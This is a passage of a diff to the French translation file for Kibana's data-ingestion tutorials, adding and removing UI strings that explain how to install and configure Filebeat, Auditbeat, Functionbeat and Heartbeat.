Cisco avec Filebeat.", - "home.tutorials.cloudwatchLogs.longDescription": "Collectez les logs Cloudwatch en déployant Functionbeat à des fins d'exécution en tant que fonction AWS Lambda. 
[En savoir plus]({learnMoreLink}).", - "home.tutorials.cloudwatchLogs.nameTitle": "Logs Cloudwatch AWS", + "home.tutorials.cloudwatchLogs.nameTitle": "Logs Cloudwatch AWS", "home.tutorials.cloudwatchLogs.shortDescription": "Collectez et analysez les logs à partir d'AWS Cloudwatch avec Functionbeat.", "home.tutorials.cockroachdbMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs CockroachDB", - "home.tutorials.cockroachdbMetrics.longDescription": "Le module Metricbeat ''cockroachbd'' récupère les indicateurs depuis CockroachDB. [En savoir plus]({learnMoreLink}).", "home.tutorials.cockroachdbMetrics.nameTitle": "Indicateurs CockroachDB", "home.tutorials.cockroachdbMetrics.shortDescription": "Collectez les indicateurs à partir des serveurs CockroachDB avec Metricbeat.", "home.tutorials.common.auditbeat.cloudInstructions.gettingStarted.title": "Commencer", "home.tutorials.common.auditbeat.premCloudInstructions.gettingStarted.title": "Commencer", "home.tutorials.common.auditbeat.premInstructions.gettingStarted.title": "Commencer", - "home.tutorials.common.auditbeatCloudInstructions.config.debTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", "home.tutorials.common.auditbeatCloudInstructions.config.debTitle": "Modifier la configuration", - "home.tutorials.common.auditbeatCloudInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", "home.tutorials.common.auditbeatCloudInstructions.config.osxTitle": "Modifier la configuration", - "home.tutorials.common.auditbeatCloudInstructions.config.rpmTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", "home.tutorials.common.auditbeatCloudInstructions.config.rpmTitle": "Modifier la configuration", - "home.tutorials.common.auditbeatCloudInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", 
"home.tutorials.common.auditbeatCloudInstructions.config.windowsTitle": "Modifier la configuration", - "home.tutorials.common.auditbeatInstructions.config.debTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", - "home.tutorials.common.auditbeatInstructions.config.debTextPre": "Modifiez {path} afin de définir les informations de connexion :", "home.tutorials.common.auditbeatInstructions.config.debTitle": "Modifier la configuration", - "home.tutorials.common.auditbeatInstructions.config.osxTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. 
[Learn more]({linkUrl}).", - "home.tutorials.common.auditbeatInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion :", "home.tutorials.common.auditbeatInstructions.config.osxTitle": "Modifier la configuration", - "home.tutorials.common.auditbeatInstructions.config.rpmTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", - "home.tutorials.common.auditbeatInstructions.config.rpmTextPre": "Modifiez {path} afin de définir les informations de connexion :", "home.tutorials.common.auditbeatInstructions.config.rpmTitle": "Modifier la configuration", - "home.tutorials.common.auditbeatInstructions.config.windowsTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n > **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. 
[Learn more]({linkUrl}).", - "home.tutorials.common.auditbeatInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion :", "home.tutorials.common.auditbeatInstructions.config.windowsTitle": "Modifier la configuration", - "home.tutorials.common.auditbeatInstructions.install.debTextPost": "Vous cherchez les packages 32 bits ? Consultez la [page de téléchargement]({linkUrl}).", - "home.tutorials.common.auditbeatInstructions.install.debTextPre": "Vous utilisez Auditbeat pour la première fois ? Consultez le [guide de démarrage rapide]({linkUrl}).", "home.tutorials.common.auditbeatInstructions.install.debTitle": "Télécharger et installer Auditbeat", - "home.tutorials.common.auditbeatInstructions.install.osxTextPre": "Vous utilisez Auditbeat pour la première fois ? Consultez le [guide de démarrage rapide]({linkUrl}).", "home.tutorials.common.auditbeatInstructions.install.osxTitle": "Télécharger et installer Auditbeat", - "home.tutorials.common.auditbeatInstructions.install.rpmTextPost": "Vous cherchez les packages 32 bits ? Consultez la [page de téléchargement]({linkUrl}).", - "home.tutorials.common.auditbeatInstructions.install.rpmTextPre": "Vous utilisez Auditbeat pour la première fois ? Consultez le [guide de démarrage rapide]({linkUrl}).", "home.tutorials.common.auditbeatInstructions.install.rpmTitle": "Télécharger et installer Auditbeat", - "home.tutorials.common.auditbeatInstructions.install.windowsTextPost": "Modifiez les paramètres sous {propertyName} dans le fichier {auditbeatPath} afin de pointer vers votre installation Elasticsearch.", - "home.tutorials.common.auditbeatInstructions.install.windowsTextPre": "Vous utilisez Auditbeat pour la première fois ? Consultez le [guide de démarrage rapide]({guideLinkUrl}).\n 1. Téléchargez le fichier .zip Auditbeat pour Windows via la page [Télécharger]({auditbeatLinkUrl}).\n 2. Extrayez le contenu du fichier compressé sous {folderPath}.\n 3. 
Renommez le répertoire \"{directoryName}\" en \"Auditbeat\".\n 4. Ouvrez une invite PowerShell en tant qu'administrateur (faites un clic droit sur l'icône PowerShell et sélectionnez **Exécuter en tant qu'administrateur**). Si vous exécutez Windows XP, vous devrez peut-être télécharger et installer PowerShell.\n 5. Dans l'invite PowerShell, exécutez les commandes suivantes afin d'installer Auditbeat en tant que service Windows.", "home.tutorials.common.auditbeatInstructions.install.windowsTitle": "Télécharger et installer Auditbeat", "home.tutorials.common.auditbeatInstructions.start.debTextPre": "La commande ''setup'' charge les tableaux de bord Kibana. Si les tableaux de bord sont déjà configurés, omettez cette commande.", "home.tutorials.common.auditbeatInstructions.start.debTitle": "Lancer Auditbeat", 
@@ -4011,50 +3304,22 @@ "home.tutorials.common.auditbeatStatusCheck.successText": "Des données ont été reçues.", "home.tutorials.common.auditbeatStatusCheck.text": "Vérifier que des données sont reçues d'Auditbeat", "home.tutorials.common.auditbeatStatusCheck.title": "Statut", - "home.tutorials.common.cloudInstructions.passwordAndResetLink": "Où {passwordTemplate} est le mot de passe de l'utilisateur ''elastic''.\\{#config.cloud.profileUrl\\}\n Mot de passe oublié ? [Réinitialiser dans Elastic Cloud](\\{config.cloud.baseUrl\\}\\{config.cloud.deploymentUrl\\}/security).\n \\{/config.cloud.profileUrl\\}\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration.", + "home.tutorials.common.cloudInstructions.passwordAndResetLink": "Où {passwordTemplate} est le mot de passe de l'utilisateur ''elastic''.\\{#config.cloud.profileUrl\\}\n Mot de passe oublié ? [Réinitialiser dans Elastic Cloud](\\{config.cloud.baseUrl\\}\\{config.cloud.deploymentUrl\\}/security).\n \\{/config.cloud.profileUrl\\}\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. 
À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration.", "home.tutorials.common.filebeat.cloudInstructions.gettingStarted.title": "Commencer", "home.tutorials.common.filebeat.premCloudInstructions.gettingStarted.title": "Commencer", "home.tutorials.common.filebeat.premInstructions.gettingStarted.title": "Commencer", - "home.tutorials.common.filebeatCloudInstructions.config.debTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", "home.tutorials.common.filebeatCloudInstructions.config.debTitle": "Modifier la configuration", - "home.tutorials.common.filebeatCloudInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", "home.tutorials.common.filebeatCloudInstructions.config.osxTitle": "Modifier la configuration", - "home.tutorials.common.filebeatCloudInstructions.config.rpmTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", "home.tutorials.common.filebeatCloudInstructions.config.rpmTitle": "Modifier la configuration", - "home.tutorials.common.filebeatCloudInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", "home.tutorials.common.filebeatCloudInstructions.config.windowsTitle": "Modifier la configuration", - "home.tutorials.common.filebeatEnableInstructions.debTextPost": "Modifiez les paramètres dans le fichier ''/etc/filebeat/modules.d/{moduleName}.yml''.", - "home.tutorials.common.filebeatEnableInstructions.debTitle": "Activer et configurer le module {moduleName}", - "home.tutorials.common.filebeatEnableInstructions.osxTextPost": "Modifiez les paramètres dans le fichier ''modules.d/{moduleName}.yml''.", - "home.tutorials.common.filebeatEnableInstructions.osxTextPre": "Dans le répertoire d'installation, exécutez la commande suivante :", - 
"home.tutorials.common.filebeatEnableInstructions.osxTitle": "Activer et configurer le module {moduleName}", - "home.tutorials.common.filebeatEnableInstructions.rpmTextPost": "Modifiez les paramètres dans le fichier ''/etc/filebeat/modules.d/{moduleName}.yml''.", - "home.tutorials.common.filebeatEnableInstructions.rpmTitle": "Activer et configurer le module {moduleName}", - "home.tutorials.common.filebeatEnableInstructions.windowsTextPost": "Modifiez les paramètres dans le fichier ''modules.d/{moduleName}.yml''.", - "home.tutorials.common.filebeatEnableInstructions.windowsTextPre": "Dans le dossier {path}, exécutez la commande suivante :", - "home.tutorials.common.filebeatEnableInstructions.windowsTitle": "Activer et configurer le module {moduleName}", - "home.tutorials.common.filebeatInstructions.config.debTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. 
[Learn more]({linkUrl}).", - "home.tutorials.common.filebeatInstructions.config.debTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.filebeatEnableInstructions.osxTextPre": "Dans le répertoire d'installation, exécutez la commande suivante :", "home.tutorials.common.filebeatInstructions.config.debTitle": "Modifier la configuration", - "home.tutorials.common.filebeatInstructions.config.osxTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", - "home.tutorials.common.filebeatInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion :", "home.tutorials.common.filebeatInstructions.config.osxTitle": "Modifier la configuration", - "home.tutorials.common.filebeatInstructions.config.rpmTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. 
[Learn more]({linkUrl}).", - "home.tutorials.common.filebeatInstructions.config.rpmTextPre": "Modifiez {path} afin de définir les informations de connexion :", "home.tutorials.common.filebeatInstructions.config.rpmTitle": "Modifier la configuration", - "home.tutorials.common.filebeatInstructions.config.windowsTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", - "home.tutorials.common.filebeatInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion :", "home.tutorials.common.filebeatInstructions.config.windowsTitle": "Modifier la configuration", - "home.tutorials.common.filebeatInstructions.install.debTextPost": "Vous cherchez les packages 32 bits ? Consultez la [page de téléchargement]({linkUrl}).", - "home.tutorials.common.filebeatInstructions.install.debTextPre": "Vous utilisez Filebeat pour la première fois ? Consultez le [guide de démarrage rapide]({linkUrl}).", "home.tutorials.common.filebeatInstructions.install.debTitle": "Télécharger et installer Filebeat", - "home.tutorials.common.filebeatInstructions.install.osxTextPre": "Vous utilisez Filebeat pour la première fois ? Consultez le [guide de démarrage rapide]({linkUrl}).", "home.tutorials.common.filebeatInstructions.install.osxTitle": "Télécharger et installer Filebeat", - "home.tutorials.common.filebeatInstructions.install.rpmTextPost": "Vous cherchez les packages 32 bits ? 
Consultez la [page de téléchargement]({linkUrl}).", - "home.tutorials.common.filebeatInstructions.install.rpmTextPre": "Vous utilisez Filebeat pour la première fois ? Consultez le [guide de démarrage rapide]({linkUrl}).", "home.tutorials.common.filebeatInstructions.install.rpmTitle": "Télécharger et installer Filebeat", - "home.tutorials.common.filebeatInstructions.install.windowsTextPost": "Modifiez les paramètres sous {propertyName} dans le fichier {filebeatPath} afin de pointer vers votre installation Elasticsearch.", - "home.tutorials.common.filebeatInstructions.install.windowsTextPre": "Vous utilisez Filebeat pour la première fois ? Consultez le [guide de démarrage rapide]({guideLinkUrl}).\n 1. Téléchargez le fichier .zip Filebeat pour Windows via la page [Télécharger]({filebeatLinkUrl}).\n 2. Extrayez le contenu du fichier compressé sous {folderPath}.\n 3. Renommez le répertoire \"{directoryName}\" en \"Filebeat\".\n 4. Ouvrez une invite PowerShell en tant qu'administrateur (faites un clic droit sur l'icône PowerShell et sélectionnez **Exécuter en tant qu'administrateur**). Si vous exécutez Windows XP, vous devrez peut-être télécharger et installer PowerShell.\n 5. Dans l'invite PowerShell, exécutez les commandes suivantes afin d'installer Filebeat en tant que service Windows.", "home.tutorials.common.filebeatInstructions.install.windowsTitle": "Télécharger et installer Filebeat", "home.tutorials.common.filebeatInstructions.start.debTextPre": "La commande ''setup'' charge les tableaux de bord Kibana. Si les tableaux de bord sont déjà configurés, omettez cette commande.", "home.tutorials.common.filebeatInstructions.start.debTitle": "Lancer Filebeat", 
@@ -4067,37 +3332,26 @@ "home.tutorials.common.filebeatStatusCheck.buttonLabel": "Vérifier les données", "home.tutorials.common.filebeatStatusCheck.errorText": "Aucune donnée n'a encore été reçue de ce module.", "home.tutorials.common.filebeatStatusCheck.successText": "Des données ont été reçues de ce module.", - "home.tutorials.common.filebeatStatusCheck.text": "Vérifier que des données sont reçues du module Filebeat \"{moduleName}\"", "home.tutorials.common.filebeatStatusCheck.title": "Statut du module", "home.tutorials.common.functionbeat.cloudInstructions.gettingStarted.title": "Commencer", "home.tutorials.common.functionbeat.premCloudInstructions.gettingStarted.title": "Commencer", "home.tutorials.common.functionbeat.premInstructions.gettingStarted.title": "Commencer", "home.tutorials.common.functionbeatAWSInstructions.textPost": "Où '''' et '''' sont vos informations d'identification et ''us-east-1'' est la région désirée.", - "home.tutorials.common.functionbeatAWSInstructions.textPre": "Définissez vos informations d'identification AWS dans l'environnement :", - "home.tutorials.common.functionbeatAWSInstructions.title": "Définir des informations d'identification AWS", - "home.tutorials.common.functionbeatCloudInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.functionbeatAWSInstructions.textPre": "Définissez vos informations d'identification AWS dans l'environnement :", + "home.tutorials.common.functionbeatAWSInstructions.title": "Définir des informations d'identification AWS", "home.tutorials.common.functionbeatCloudInstructions.config.osxTitle": "Modifier la configuration", - "home.tutorials.common.functionbeatCloudInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", "home.tutorials.common.functionbeatCloudInstructions.config.windowsTitle": "Modifier la configuration", - 
"home.tutorials.common.functionbeatEnableOnPremInstructions.defaultTextPost": "Où '''' est le nom du groupe de logs à importer et '''' un nom de compartiment S3 valide pour la mise en œuvre du déploiement de Functionbeat.", + "home.tutorials.common.functionbeatEnableOnPremInstructions.defaultTextPost": "Où '''' est le nom du groupe de logs à importer et '''' un nom de compartiment S3 valide pour la mise en œuvre du déploiement de Functionbeat.", "home.tutorials.common.functionbeatEnableOnPremInstructions.defaultTitle": "Configurer le groupe de logs Cloudwatch", "home.tutorials.common.functionbeatEnableOnPremInstructionsOSXLinux.textPre": "Modifiez les paramètres dans le fichier ''functionbeat.yml''.", - "home.tutorials.common.functionbeatEnableOnPremInstructionsWindows.textPre": "Modifiez les paramètres dans le fichier {path}.", - "home.tutorials.common.functionbeatInstructions.config.osxTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n > **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. 
[Learn more]({linkUrl}).", - "home.tutorials.common.functionbeatInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion :", "home.tutorials.common.functionbeatInstructions.config.osxTitle": "Configurer le cluster Elastic", - "home.tutorials.common.functionbeatInstructions.config.windowsTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n > **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", - "home.tutorials.common.functionbeatInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion :", "home.tutorials.common.functionbeatInstructions.config.windowsTitle": "Modifier la configuration", "home.tutorials.common.functionbeatInstructions.deploy.osxTextPre": "Ceci permet d'installer Functionbeat en tant que fonction Lambda. La commande ''setup'' vérifie la configuration d'Elasticsearch et charge le modèle d'indexation Kibana. L'omission de cette commande est normalement sans risque.", - "home.tutorials.common.functionbeatInstructions.deploy.osxTitle": "Déployer Functionbeat en tant que fonction AWS Lambda", + "home.tutorials.common.functionbeatInstructions.deploy.osxTitle": "Déployer Functionbeat en tant que fonction AWS Lambda", "home.tutorials.common.functionbeatInstructions.deploy.windowsTextPre": "Ceci permet d'installer Functionbeat en tant que fonction Lambda. 
La commande ''setup'' vérifie la configuration d'Elasticsearch et charge le modèle d'indexation Kibana. L'omission de cette commande est normalement sans risque.", - "home.tutorials.common.functionbeatInstructions.deploy.windowsTitle": "Déployer Functionbeat en tant que fonction AWS Lambda", - "home.tutorials.common.functionbeatInstructions.install.linuxTextPre": "Vous utilisez Functionbeat pour la première fois ? Consultez le [guide de démarrage rapide]({link}).", + "home.tutorials.common.functionbeatInstructions.deploy.windowsTitle": "Déployer Functionbeat en tant que fonction AWS Lambda", "home.tutorials.common.functionbeatInstructions.install.linuxTitle": "Télécharger et installer Functionbeat", - "home.tutorials.common.functionbeatInstructions.install.osxTextPre": "Vous utilisez Functionbeat pour la première fois ? Consultez le [guide de démarrage rapide]({link}).", "home.tutorials.common.functionbeatInstructions.install.osxTitle": "Télécharger et installer Functionbeat", - "home.tutorials.common.functionbeatInstructions.install.windowsTextPre": "Vous utilisez Functionbeat pour la première fois ? Consultez le [guide de démarrage rapide]({functionbeatLink}).\n 1. Téléchargez le fichier .zip Functionbeat pour Windows via la page [Télécharger]({elasticLink}).\n 2. Extrayez le contenu du fichier compressé sous {folderPath}.\n 3. Renommez le répertoire \"{directoryName}\" en \"Functionbeat\".\n 4. Ouvrez une invite PowerShell en tant qu'administrateur (faites un clic droit sur l'icône PowerShell et sélectionnez **Exécuter en tant qu'administrateur**). Si vous exécutez Windows XP, vous devrez peut-être télécharger et installer PowerShell.\n 5. 
Depuis l'invite PowerShell, accédez au répertoire Functionbeat :", "home.tutorials.common.functionbeatInstructions.install.windowsTitle": "Télécharger et installer Functionbeat", "home.tutorials.common.functionbeatStatusCheck.buttonLabel": "Vérifier les données", "home.tutorials.common.functionbeatStatusCheck.errorText": "Aucune donnée n'a encore été reçue de Functionbeat.", 
@@ -4107,46 +3361,27 @@ "home.tutorials.common.heartbeat.cloudInstructions.gettingStarted.title": "Commencer", "home.tutorials.common.heartbeat.premCloudInstructions.gettingStarted.title": "Commencer", "home.tutorials.common.heartbeat.premInstructions.gettingStarted.title": "Commencer", - "home.tutorials.common.heartbeatCloudInstructions.config.debTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", "home.tutorials.common.heartbeatCloudInstructions.config.debTitle": "Modifier la configuration", - "home.tutorials.common.heartbeatCloudInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", "home.tutorials.common.heartbeatCloudInstructions.config.osxTitle": "Modifier la configuration", - "home.tutorials.common.heartbeatCloudInstructions.config.rpmTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", "home.tutorials.common.heartbeatCloudInstructions.config.rpmTitle": "Modifier la configuration", - "home.tutorials.common.heartbeatCloudInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", "home.tutorials.common.heartbeatCloudInstructions.config.windowsTitle": "Modifier la configuration", "home.tutorials.common.heartbeatEnableCloudInstructions.debTextPre": "Modifiez le paramètre ''heartbeat.monitors'' dans le fichier ''heartbeat.yml''.", - "home.tutorials.common.heartbeatEnableCloudInstructions.defaultTextPost": "Pour plus d’informations sur comment configurer des moniteurs dans Heartbeat, consultez les [documents de configuration de Heartbeat.]({configureLink})", "home.tutorials.common.heartbeatEnableCloudInstructions.defaultTitle": "Modifier la configuration – Ajouter des moniteurs", "home.tutorials.common.heartbeatEnableCloudInstructions.osxTextPre": "Modifiez le paramètre ''heartbeat.monitors'' dans le fichier ''heartbeat.yml''.", 
"home.tutorials.common.heartbeatEnableCloudInstructions.rpmTextPre": "Modifiez le paramètre ''heartbeat.monitors'' dans le fichier ''heartbeat.yml''.", "home.tutorials.common.heartbeatEnableCloudInstructions.windowsTextPre": "Modifiez le paramètre ''heartbeat.monitors'' dans le fichier ''heartbeat.yml''.", "home.tutorials.common.heartbeatEnableOnPremInstructions.debTextPre": "Modifiez le paramètre ''heartbeat.monitors'' dans le fichier ''heartbeat.yml''.", - "home.tutorials.common.heartbeatEnableOnPremInstructions.defaultTextPost": "Où {hostTemplate} est l’URL monitorée. Pour plus d’informations sur comment configurer des moniteurs dans Heartbeat, consultez les [documents de configuration de Heartbeat.]({configureLink})", "home.tutorials.common.heartbeatEnableOnPremInstructions.defaultTitle": "Modifier la configuration – Ajouter des moniteurs", "home.tutorials.common.heartbeatEnableOnPremInstructions.osxTextPre": "Modifiez le paramètre ''heartbeat.monitors'' dans le fichier ''heartbeat.yml''.", "home.tutorials.common.heartbeatEnableOnPremInstructions.rpmTextPre": "Modifiez le paramètre ''heartbeat.monitors'' dans le fichier ''heartbeat.yml''.", "home.tutorials.common.heartbeatEnableOnPremInstructions.windowsTextPre": "Modifiez le paramètre ''heartbeat.monitors'' dans le fichier ''heartbeat.yml''.", - "home.tutorials.common.heartbeatInstructions.config.debTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. 
[Learn more]({linkUrl}).", - "home.tutorials.common.heartbeatInstructions.config.debTextPre": "Modifiez {path} afin de définir les informations de connexion :", "home.tutorials.common.heartbeatInstructions.config.debTitle": "Modifier la configuration", - "home.tutorials.common.heartbeatInstructions.config.osxTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", - "home.tutorials.common.heartbeatInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion :", "home.tutorials.common.heartbeatInstructions.config.osxTitle": "Modifier la configuration", - "home.tutorials.common.heartbeatInstructions.config.rpmTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. 
[Learn more]({linkUrl}).", - "home.tutorials.common.heartbeatInstructions.config.rpmTextPre": "Modifiez {path} afin de définir les informations de connexion :", "home.tutorials.common.heartbeatInstructions.config.rpmTitle": "Modifier la configuration", - "home.tutorials.common.heartbeatInstructions.config.windowsTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n > **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", - "home.tutorials.common.heartbeatInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion :", "home.tutorials.common.heartbeatInstructions.config.windowsTitle": "Modifier la configuration", - "home.tutorials.common.heartbeatInstructions.install.debTextPost": "Vous cherchez les packages 32 bits ? Consultez la [page de téléchargement]({link}).", - "home.tutorials.common.heartbeatInstructions.install.debTextPre": "Vous utilisez Heartbeat pour la première fois ? Consultez le [guide de démarrage rapide]({link}).", "home.tutorials.common.heartbeatInstructions.install.debTitle": "Télécharger et installer Heartbeat", - "home.tutorials.common.heartbeatInstructions.install.osxTextPre": "Vous utilisez Heartbeat pour la première fois ? 
